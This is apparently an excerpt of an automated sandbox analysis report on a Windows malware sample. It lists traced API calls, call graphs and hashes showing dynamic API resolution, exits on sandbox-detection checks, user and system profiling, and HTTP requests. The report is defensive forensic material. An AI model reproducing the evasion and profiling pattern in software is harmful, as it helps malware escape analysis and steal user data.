27034->27035 27036 c7280 lstrcpy 27035->27036 27037 a5274 27036->27037 27038 c7310 3 API calls 27037->27038 27039 a5289 27038->27039 27040 c7280 lstrcpy 27039->27040 27041 a5292 27040->27041 27042 c72c0 2 API calls 27041->27042 27043 a52a5 27042->27043 27044 c7280 lstrcpy 27043->27044 27045 a52ae 27044->27045 27046 c7310 3 API calls 27045->27046 27047 a52c3 27046->27047 27048 c7280 lstrcpy 27047->27048 27049 a52cc 27048->27049 
27050 c7310 3 API calls 27049->27050 27051 a52e2 27050->27051 27052 c7280 lstrcpy 27051->27052 27053 a52eb 27052->27053 27054 c7310 3 API calls 27053->27054 27055 a5301 27054->27055 27056 c7280 lstrcpy 27055->27056 27057 a530a 27056->27057 27058 c7310 3 API calls 27057->27058 27059 a531f 27058->27059 27060 c7280 lstrcpy 27059->27060 27061 a5328 27060->27061 27062 c72c0 2 API calls 27061->27062 27063 a533b 27062->27063 27064 c7280 lstrcpy 27063->27064 27065 a5344 27064->27065 27066 a537c 27065->27066 27067 a5370 lstrcpy 27065->27067 27068 c72c0 2 API calls 27066->27068 27067->27066 27069 a538a 27068->27069 27070 c72c0 2 API calls 27069->27070 27071 a5397 27070->27071 27072 c7280 lstrcpy 27071->27072 27073 a53a1 27072->27073 27074 a53b1 lstrlen lstrlen HttpSendRequestA InternetReadFile 27073->27074 27075 a549c InternetCloseHandle 27074->27075 27079 a53f2 27074->27079 27077 a54ae 27075->27077 27076 a53fd lstrlen 27076->27079 27077->27005 27078 a542e lstrcpy lstrcat 27078->27079 27079->27075 27079->27076 27079->27078 27080 a5473 27079->27080 27081 a546b lstrcpy 27079->27081 27082 a547a InternetReadFile 27080->27082 27081->27080 27082->27075 27082->27079 27084 b8ccd 27083->27084 27085 b8cc6 ExitProcess 27083->27085 27086 b8ee2 27084->27086 27087 b8e88 lstrlen 27084->27087 27088 b8e6f StrCmpCA 27084->27088 27089 b8d06 lstrlen 27084->27089 27090 b8d84 StrCmpCA 27084->27090 27091 b8da4 StrCmpCA 27084->27091 27092 b8d5a lstrlen 27084->27092 27093 b8dbd StrCmpCA 27084->27093 27094 b8ddd StrCmpCA 27084->27094 27095 b8dfd StrCmpCA 27084->27095 27096 b8e1d StrCmpCA 27084->27096 27097 b8e3d StrCmpCA 27084->27097 27098 b8d30 lstrlen 27084->27098 27099 b8e56 StrCmpCA 27084->27099 27100 b8ebb lstrcpy 27084->27100 27086->25974 27087->27084 27088->27084 27089->27084 27090->27084 27091->27084 27092->27084 27093->27084 27094->27084 27095->27084 27096->27084 27097->27084 27098->27084 27099->27084 27100->27084 27101->25980 27102->25982 27103->25988 27104->25990 27105->25996 27106->25998 
27107->26004 27108->26008 27109->26014 27110->26016 27111->26020 27112->26034 27113->26038 27114->26037 27115->26033 27116->26037 27117->26053 27118->26039 27119->26043 27120->26044 27121->26050 27122->26055 27123->26057 27124->26064 27125->26070 27126->26092 27127->26095 27128->26094 27129->26090 27130->26094 27131->26104 27134 a161f 27133->27134 27135 a162b lstrcpy 27134->27135 27136 a1633 27134->27136 27135->27136 27137 a164d lstrcpy 27136->27137 27138 a1655 27136->27138 27137->27138 27139 a166f lstrcpy 27138->27139 27140 a1677 27138->27140 27139->27140 27141 a1699 27140->27141 27142 a1691 lstrcpy 27140->27142 27141->26826 27142->27141 27144 c71e6 27143->27144 27145 c71fc lstrcpy 27144->27145 27146 c2860 27144->27146 27145->27146 27146->25969 27148 a4bd0 27147->27148 27148->27148 27149 a4bd7 ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI lstrlen InternetCrackUrlA 27148->27149 27150 a4c41 27149->27150 27150->26934 27152 c3e83 27151->27152 27153 c3e9f lstrcpy 27152->27153 27154 c3eab 27152->27154 27153->27154 27155 c3ecd lstrcpy 27154->27155 27156 c3ed5 GetSystemTime 27154->27156 27155->27156 27157 c3ef3 27156->27157 27157->26953 27160 c732d 27158->27160 27159 a519b 27162 c7280 27159->27162 27160->27159 27161 c733d lstrcpy lstrcat 27160->27161 27161->27159 27163 c728c 27162->27163 27164 c72b4 27163->27164 27165 c72ac lstrcpy 27163->27165 27164->27009 27165->27164 27168 c72dc 27166->27168 27167 a51b7 27167->27012 27168->27167 27169 c72ed lstrcpy lstrcat 27168->27169 27169->27167 27180 b4c77 295 API calls 27202 c31f0 GetSystemInfo wsprintfA 27181 c8471 122 API calls 2 library calls
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000A4C7F
                                    • lstrcpy.KERNEL32(00000000,000CCFEC), ref: 000A4CD2
                                    • lstrcpy.KERNEL32(00000000,000CCFEC), ref: 000A4D05
                                    • lstrcpy.KERNEL32(00000000,000CCFEC), ref: 000A4D35
                                    • lstrcpy.KERNEL32(00000000,000CCFEC), ref: 000A4D73
                                    • lstrcpy.KERNEL32(00000000,000CCFEC), ref: 000A4DA6
                                    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 000A4DB6
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$InternetOpen
                                    • String ID: "$------$x$
                                    • API String ID: 2041821634-9601006
                                    • Opcode ID: 92013534c95fc20b49f2a6fff8efd69d3580100824264be5dca8a11ee7fcc496
                                    • Instruction ID: ece7e787456e9b905165f04b551bd6c21130697834929c5a31410a3c2f6a0b5b
                                    • Opcode Fuzzy Hash: 92013534c95fc20b49f2a6fff8efd69d3580100824264be5dca8a11ee7fcc496
                                    • Instruction Fuzzy Hash: 25527E31E016169FDB21EFE8DC49BDEB7B9AF45301F044029F905AB252DB74ED428BA1

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 2125 c6390-c63bd GetPEB 2126 c65c3-c6623 LoadLibraryA * 5 2125->2126 2127 c63c3-c65be call c62f0 GetProcAddress * 20 2125->2127 2129 c6638-c663f 2126->2129 2130 c6625-c6633 GetProcAddress 2126->2130 2127->2126 2132 c666c-c6673 2129->2132 2133 c6641-c6667 GetProcAddress * 2 2129->2133 2130->2129 2134 c6688-c668f 2132->2134 2135 c6675-c6683 GetProcAddress 2132->2135 2133->2132 2137 c66a4-c66ab 2134->2137 2138 c6691-c669f GetProcAddress 2134->2138 2135->2134 2139 c66ad-c66d2 GetProcAddress * 2 2137->2139 2140 c66d7-c66da 2137->2140 2138->2137 2139->2140
                                    APIs
                                    • GetProcAddress.KERNEL32(75900000,00E60738), ref: 000C63E9
                                    • GetProcAddress.KERNEL32(75900000,00E605E8), ref: 000C6402
                                    • GetProcAddress.KERNEL32(75900000,00E607E0), ref: 000C641A
                                    • GetProcAddress.KERNEL32(75900000,00E60588), ref: 000C6432
                                    • GetProcAddress.KERNEL32(75900000,00E68AE0), ref: 000C644B
                                    • GetProcAddress.KERNEL32(75900000,00E56480), ref: 000C6463
                                    • GetProcAddress.KERNEL32(75900000,00E56280), ref: 000C647B
                                    • GetProcAddress.KERNEL32(75900000,00E60720), ref: 000C6494
                                    • GetProcAddress.KERNEL32(75900000,00E607B0), ref: 000C64AC
                                    • GetProcAddress.KERNEL32(75900000,00E60630), ref: 000C64C4
                                    • GetProcAddress.KERNEL32(75900000,00E60648), ref: 000C64DD
                                    • GetProcAddress.KERNEL32(75900000,00E56560), ref: 000C64F5
                                    • GetProcAddress.KERNEL32(75900000,00E607F8), ref: 000C650D
                                    • GetProcAddress.KERNEL32(75900000,00E60828), ref: 000C6526
                                    • GetProcAddress.KERNEL32(75900000,00E56580), ref: 000C653E
                                    • GetProcAddress.KERNEL32(75900000,00E60840), ref: 000C6556
                                    • GetProcAddress.KERNEL32(75900000,00E60600), ref: 000C656F
                                    • GetProcAddress.KERNEL32(75900000,00E56540), ref: 000C6587
                                    • GetProcAddress.KERNEL32(75900000,00E60618), ref: 000C659F
                                    • GetProcAddress.KERNEL32(75900000,00E564C0), ref: 000C65B8
                                    • LoadLibraryA.KERNEL32(00E605A0,?,?,?,000C1C03), ref: 000C65C9
                                    • LoadLibraryA.KERNEL32(00E60678,?,?,?,000C1C03), ref: 000C65DB
                                    • LoadLibraryA.KERNEL32(00E60690,?,?,?,000C1C03), ref: 000C65ED
                                    • LoadLibraryA.KERNEL32(00E606D8,?,?,?,000C1C03), ref: 000C65FE
                                    • LoadLibraryA.KERNEL32(00E606A8,?,?,?,000C1C03), ref: 000C6610
                                    • GetProcAddress.KERNEL32(75070000,00E60558), ref: 000C662D
                                    • GetProcAddress.KERNEL32(75FD0000,00E60570), ref: 000C6649
                                    • GetProcAddress.KERNEL32(75FD0000,00E68EF8), ref: 000C6661
                                    • GetProcAddress.KERNEL32(75A50000,00E68FA0), ref: 000C667D
                                    • GetProcAddress.KERNEL32(74E50000,00E56500), ref: 000C6699
                                    • GetProcAddress.KERNEL32(76E80000,00E68B50), ref: 000C66B5
                                    • GetProcAddress.KERNEL32(76E80000,NtQueryInformationProcess), ref: 000C66CC
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AddressProc$LibraryLoad
                                    • String ID: @e$NtQueryInformationProcess$`e
                                    • API String ID: 2238633743-3649666148
                                    • Opcode ID: f20b94e42e5f5b273f179ffd7e1368133ed1692683aa192bfa53121a3be8b288
                                    • Instruction ID: 7ebc08535502ba9e5541d7f591a2cecd98d8d71b2a3d2bf512587fb10ab2f47a
                                    • Opcode Fuzzy Hash: f20b94e42e5f5b273f179ffd7e1368133ed1692683aa192bfa53121a3be8b288
                                    • Instruction Fuzzy Hash: CFA129B5E12200AFD754DF69FD8CA263BB9F788642350851BF956D3364DA34AC80DF60

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 2141 c1bf0-c1c0b call a2a90 call c6390 2146 c1c0d 2141->2146 2147 c1c1a-c1c27 call a2930 2141->2147 2148 c1c10-c1c18 2146->2148 2151 c1c29-c1c2f lstrcpy 2147->2151 2152 c1c35-c1c63 2147->2152 2148->2147 2148->2148 2151->2152 2156 c1c6d-c1c7b GetSystemInfo 2152->2156 2157 c1c65-c1c67 ExitProcess 2152->2157 2158 c1c7d-c1c7f ExitProcess 2156->2158 2159 c1c85-c1ca0 call a1030 call a10c0 GetUserDefaultLangID 2156->2159 2164 c1cb8-c1cca call c2ad0 call c3e10 2159->2164 2165 c1ca2-c1ca9 2159->2165 2171 c1ccc-c1cde call c2a40 call c3e10 2164->2171 2172 c1ce7-c1d06 lstrlen call a2930 2164->2172 2165->2164 2166 c1cb0-c1cb2 ExitProcess 2165->2166 2171->2172 2183 c1ce0-c1ce1 ExitProcess 2171->2183 2178 c1d08-c1d0d 2172->2178 2179 c1d23-c1d40 lstrlen call a2930 2172->2179 2178->2179 2181 c1d0f-c1d11 2178->2181 2186 c1d5a-c1d7b call c2ad0 lstrlen call a2930 2179->2186 2187 c1d42-c1d44 2179->2187 2181->2179 2184 c1d13-c1d1d lstrcpy lstrcat 2181->2184 2184->2179 2193 c1d7d-c1d7f 2186->2193 2194 c1d9a-c1db4 lstrlen call a2930 2186->2194 2187->2186 2189 c1d46-c1d54 lstrcpy lstrcat 2187->2189 2189->2186 2193->2194 2195 c1d81-c1d85 2193->2195 2199 c1dce-c1deb call c2a40 lstrlen call a2930 2194->2199 2200 c1db6-c1db8 2194->2200 2195->2194 2197 c1d87-c1d94 lstrcpy lstrcat 2195->2197 2197->2194 2206 c1ded-c1def 2199->2206 2207 c1e0a-c1e0f 2199->2207 2200->2199 2201 c1dba-c1dc8 lstrcpy lstrcat 2200->2201 2201->2199 2206->2207 2208 c1df1-c1df5 2206->2208 2209 c1e16-c1e22 call a2930 2207->2209 2210 c1e11 call a2a20 2207->2210 2208->2207 2211 c1df7-c1e04 lstrcpy lstrcat 2208->2211 2215 c1e24-c1e26 2209->2215 2216 c1e30-c1e66 call a2a20 * 5 OpenEventA 2209->2216 2210->2209 2211->2207 2215->2216 2217 c1e28-c1e2a lstrcpy 2215->2217 2228 c1e8c-c1ea0 CreateEventA call c1b20 call bffd0 2216->2228 2229 c1e68-c1e8a CloseHandle Sleep OpenEventA 2216->2229 2217->2216 2233 c1ea5-c1eae CloseHandle ExitProcess 2228->2233 2229->2228 2229->2229
                                    APIs
                                      • Part of subcall function 000C6390: GetProcAddress.KERNEL32(75900000,00E60738), ref: 000C63E9
                                      • Part of subcall function 000C6390: GetProcAddress.KERNEL32(75900000,00E605E8), ref: 000C6402
                                      • Part of subcall function 000C6390: GetProcAddress.KERNEL32(75900000,00E607E0), ref: 000C641A
                                      • Part of subcall function 000C6390: GetProcAddress.KERNEL32(75900000,00E60588), ref: 000C6432
                                      • Part of subcall function 000C6390: GetProcAddress.KERNEL32(75900000,00E68AE0), ref: 000C644B
                                      • Part of subcall function 000C6390: GetProcAddress.KERNEL32(75900000,00E56480), ref: 000C6463
                                      • Part of subcall function 000C6390: GetProcAddress.KERNEL32(75900000,00E56280), ref: 000C647B
                                      • Part of subcall function 000C6390: GetProcAddress.KERNEL32(75900000,00E60720), ref: 000C6494
                                      • Part of subcall function 000C6390: GetProcAddress.KERNEL32(75900000,00E607B0), ref: 000C64AC
                                      • Part of subcall function 000C6390: GetProcAddress.KERNEL32(75900000,00E60630), ref: 000C64C4
                                      • Part of subcall function 000C6390: GetProcAddress.KERNEL32(75900000,00E60648), ref: 000C64DD
                                      • Part of subcall function 000C6390: GetProcAddress.KERNEL32(75900000,00E56560), ref: 000C64F5
                                      • Part of subcall function 000C6390: GetProcAddress.KERNEL32(75900000,00E607F8), ref: 000C650D
                                    • lstrcpy.KERNEL32(00000000,000CCFEC), ref: 000C1C2F
                                    • ExitProcess.KERNEL32 ref: 000C1C67
                                    • GetSystemInfo.KERNEL32(?), ref: 000C1C71
                                    • ExitProcess.KERNEL32 ref: 000C1C7F
                                      • Part of subcall function 000A1030: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 000A1046
                                      • Part of subcall function 000A1030: VirtualAllocExNuma.KERNEL32(00000000), ref: 000A104D
                                      • Part of subcall function 000A1030: ExitProcess.KERNEL32 ref: 000A1058
                                      • Part of subcall function 000A10C0: GlobalMemoryStatusEx.KERNEL32 ref: 000A10EA
                                      • Part of subcall function 000A10C0: ExitProcess.KERNEL32 ref: 000A1114
                                    • GetUserDefaultLangID.KERNEL32 ref: 000C1C8F
                                    • ExitProcess.KERNEL32 ref: 000C1CB2
                                    • ExitProcess.KERNEL32 ref: 000C1CE1
                                    • lstrlen.KERNEL32(00E68BB0), ref: 000C1CEE
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000C1D15
                                    • lstrcat.KERNEL32(00000000,00E68BB0), ref: 000C1D1D
                                    • lstrlen.KERNEL32(000D4B98), ref: 000C1D28
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000C1D48
                                    • lstrcat.KERNEL32(00000000,000D4B98), ref: 000C1D54
                                    • lstrlen.KERNEL32(00000000), ref: 000C1D63
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000C1D89
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 000C1D94
                                    • lstrlen.KERNEL32(000D4B98), ref: 000C1D9F
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000C1DBC
                                    • lstrcat.KERNEL32(00000000,000D4B98), ref: 000C1DC8
                                    • lstrlen.KERNEL32(00000000), ref: 000C1DD7
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000C1DF9
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 000C1E04
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Similarity
                                    • API ID: AddressProc$Process$Exitlstrcpy$lstrcatlstrlen$AllocCurrentDefaultGlobalInfoLangMemoryNumaStatusSystemUserVirtual
                                    • String ID:
                                    • API String ID: 3366406952-0
                                    • Opcode ID: 437592b38c427d10af359013a6fff78d472cbd58177f59b604a931fccf4f786c
                                    • Instruction ID: 9c880cb082147789f0dbc997809b985b8d30eb24e6e065d54ed3903151e328aa
                                    • Opcode Fuzzy Hash: 437592b38c427d10af359013a6fff78d472cbd58177f59b604a931fccf4f786c
                                    • Instruction Fuzzy Hash: 06716231902215AFDB61BBB4EC8DFEE37B9AF56701F04402AF906D61A2DF709C418B61

                                    APIs
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000A6C6F
                                    • lstrcpy.KERNEL32(00000000,000CCFEC), ref: 000A6CC2
                                    • InternetOpenA.WININET(000CCFEC,00000001,00000000,00000000,00000000), ref: 000A6CD5
                                    • StrCmpCA.SHLWAPI(?,00E6E578), ref: 000A6CED
                                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 000A6D15
                                    • HttpOpenRequestA.WININET(00000000,GET,?,00E6DC00,00000000,00000000,-00400100,00000000), ref: 000A6D50
                                    • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 000A6D77
                                    • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 000A6D86
                                    • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 000A6DA5
                                    • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 000A6DFF
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000A6E5B
                                    • InternetReadFile.WININET(?,00000000,000007CF,?), ref: 000A6E7D
                                    • InternetCloseHandle.WININET(00000000), ref: 000A6E8E
                                    • InternetCloseHandle.WININET(?), ref: 000A6E98
                                    • InternetCloseHandle.WININET(00000000), ref: 000A6EA2
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000A6EC3
                                    Similarity
                                    • API ID: Internet$lstrcpy$CloseHandleHttp$FileOpenReadRequest$ConnectInfoOptionQuerySend
                                    • String ID: ERROR$GET$x
                                    • API String ID: 3687753495-2288421319
                                    • Opcode ID: 7c492fc9ab4a5d062e1c8924f4c9888fe71918d6ae7a61f86a50f1874b44606b
                                    • Instruction ID: c238120c21eb738ca3e7816a69a2132c7df5846b42d97ccc976ae94b71dd514b
                                    • Opcode Fuzzy Hash: 7c492fc9ab4a5d062e1c8924f4c9888fe71918d6ae7a61f86a50f1874b44606b
                                    • Instruction Fuzzy Hash: E5818B71E01215ABEB20DFA8EC49FEE77B8AF45700F044029F909EB291DB70AD458B90

                                    APIs
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 000A4AA3
                                    • VirtualProtect.KERNEL32(00000000,00000004,00000100,?), ref: 000A4BB0
                                    Similarity
                                    • API ID: AllocateHeapProtectVirtual
                                    • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                                    • API String ID: 1542196881-3329630956
                                    • Opcode ID: b2cb1437a64c8bb34701213208cf80581da145e0035c79ef5d9d62265ceef663
                                    • Instruction ID: 331cb718d563e7567ac584f23cbf634beb7a029a4c4f7c1bccf972a5924f4e16
                                    • Opcode Fuzzy Hash: b2cb1437a64c8bb34701213208cf80581da145e0035c79ef5d9d62265ceef663
                                    • Instruction Fuzzy Hash: DE31D428B8232C779620EBEF4C67F5FAE55DFC5B60B02407776A85B380C9B15501CAB2
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 000C2A6F
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 000C2A76
                                    • GetUserNameA.ADVAPI32(00000000,00000104), ref: 000C2A8A
                                    Similarity
                                    • API ID: Heap$AllocateNameProcessUser
                                    • String ID:
                                    • API String ID: 1296208442-0
                                    • Opcode ID: f0752c8b5b9763517ae838c463449ac1eed768f29c1d53225a83f3d8591ce99f
                                    • Instruction ID: eb6027bc57cb1ade01783d6b929ef35c9de93beeaabfd71fa3742bc214bf3933
                                    • Opcode Fuzzy Hash: f0752c8b5b9763517ae838c463449ac1eed768f29c1d53225a83f3d8591ce99f
                                    • Instruction Fuzzy Hash: F5F0B4B2E41248AFC700DF88ED49F9EBBBCF705B21F000216FA15E3680D774190486A1

                                    APIs
                                    • GetProcAddress.KERNEL32(75900000,00E563A0), ref: 000C66F5
                                    • GetProcAddress.KERNEL32(75900000,00E56640), ref: 000C670D
                                    • GetProcAddress.KERNEL32(75900000,00E68C10), ref: 000C6726
                                    • GetProcAddress.KERNEL32(75900000,00E68D18), ref: 000C673E
                                    • GetProcAddress.KERNEL32(75900000,00E6CF68), ref: 000C6756
                                    • GetProcAddress.KERNEL32(75900000,00E6CFC8), ref: 000C676F
                                    • GetProcAddress.KERNEL32(75900000,00E5B5B8), ref: 000C6787
                                    • GetProcAddress.KERNEL32(75900000,00E6CF80), ref: 000C679F
                                    • GetProcAddress.KERNEL32(75900000,00E6D040), ref: 000C67B8
                                    • GetProcAddress.KERNEL32(75900000,00E6CF20), ref: 000C67D0
                                    • GetProcAddress.KERNEL32(75900000,00E6D070), ref: 000C67E8
                                    • GetProcAddress.KERNEL32(75900000,00E565C0), ref: 000C6801
                                    • GetProcAddress.KERNEL32(75900000,00E56340), ref: 000C6819
                                    • GetProcAddress.KERNEL32(75900000,00E56660), ref: 000C6831
                                    • GetProcAddress.KERNEL32(75900000,00E56600), ref: 000C684A
                                    • GetProcAddress.KERNEL32(75900000,00E6CF98), ref: 000C6862
                                    • GetProcAddress.KERNEL32(75900000,00E6D058), ref: 000C687A
                                    • GetProcAddress.KERNEL32(75900000,00E5B428), ref: 000C6893
                                    • GetProcAddress.KERNEL32(75900000,00E56360), ref: 000C68AB
                                    • GetProcAddress.KERNEL32(75900000,00E6CFE0), ref: 000C68C3
                                    • GetProcAddress.KERNEL32(75900000,00E6D010), ref: 000C68DC
                                    • GetProcAddress.KERNEL32(75900000,00E6D0B8), ref: 000C68F4
                                    • GetProcAddress.KERNEL32(75900000,00E6CF50), ref: 000C690C
                                    • GetProcAddress.KERNEL32(75900000,00E56380), ref: 000C6925
                                    • GetProcAddress.KERNEL32(75900000,00E6D088), ref: 000C693D
                                    • GetProcAddress.KERNEL32(75900000,00E6CFB0), ref: 000C6955
                                    • GetProcAddress.KERNEL32(75900000,00E6D0D0), ref: 000C696E
                                    • GetProcAddress.KERNEL32(75900000,00E6D0A0), ref: 000C6986
                                    • GetProcAddress.KERNEL32(75900000,00E6CFF8), ref: 000C699E
                                    • GetProcAddress.KERNEL32(75900000,00E6CF38), ref: 000C69B7
                                    • GetProcAddress.KERNEL32(75900000,00E6D028), ref: 000C69CF
                                    • GetProcAddress.KERNEL32(75900000,00E6C9F8), ref: 000C69E7
                                    • GetProcAddress.KERNEL32(75900000,00E6CAB8), ref: 000C6A00
                                    • GetProcAddress.KERNEL32(75900000,00E69D48), ref: 000C6A18
                                    • GetProcAddress.KERNEL32(75900000,00E6C920), ref: 000C6A30
                                    • GetProcAddress.KERNEL32(75900000,00E6CAD0), ref: 000C6A49
                                    • GetProcAddress.KERNEL32(75900000,00E563C0), ref: 000C6A61
                                    • GetProcAddress.KERNEL32(75900000,00E6CA10), ref: 000C6A79
                                    • GetProcAddress.KERNEL32(75900000,00E563E0), ref: 000C6A92
                                    • GetProcAddress.KERNEL32(75900000,00E6CB48), ref: 000C6AAA
                                    • GetProcAddress.KERNEL32(75900000,00E6CB30), ref: 000C6AC2
                                    • GetProcAddress.KERNEL32(75900000,00E56440), ref: 000C6ADB
                                    • GetProcAddress.KERNEL32(75900000,00E56460), ref: 000C6AF3
                                    • LoadLibraryA.KERNEL32(00E6CAE8,000C051F), ref: 000C6B05
                                    • LoadLibraryA.KERNEL32(00E6C998), ref: 000C6B16
                                    • LoadLibraryA.KERNEL32(00E6CB60), ref: 000C6B28
                                    • LoadLibraryA.KERNEL32(00E6C9B0), ref: 000C6B3A
                                    • LoadLibraryA.KERNEL32(00E6CB00), ref: 000C6B4B
                                    • LoadLibraryA.KERNEL32(00E6C968), ref: 000C6B5D
                                    • LoadLibraryA.KERNEL32(00E6CA28), ref: 000C6B6F
                                    • LoadLibraryA.KERNEL32(00E6CA40), ref: 000C6B80
                                    • GetProcAddress.KERNEL32(75FD0000,00E56860), ref: 000C6B9C
                                    • GetProcAddress.KERNEL32(75FD0000,00E6C9C8), ref: 000C6BB4
                                    • GetProcAddress.KERNEL32(75FD0000,00E68AF0), ref: 000C6BCD
                                    • GetProcAddress.KERNEL32(75FD0000,00E6CA58), ref: 000C6BE5
                                    • GetProcAddress.KERNEL32(75FD0000,00E56780), ref: 000C6BFD
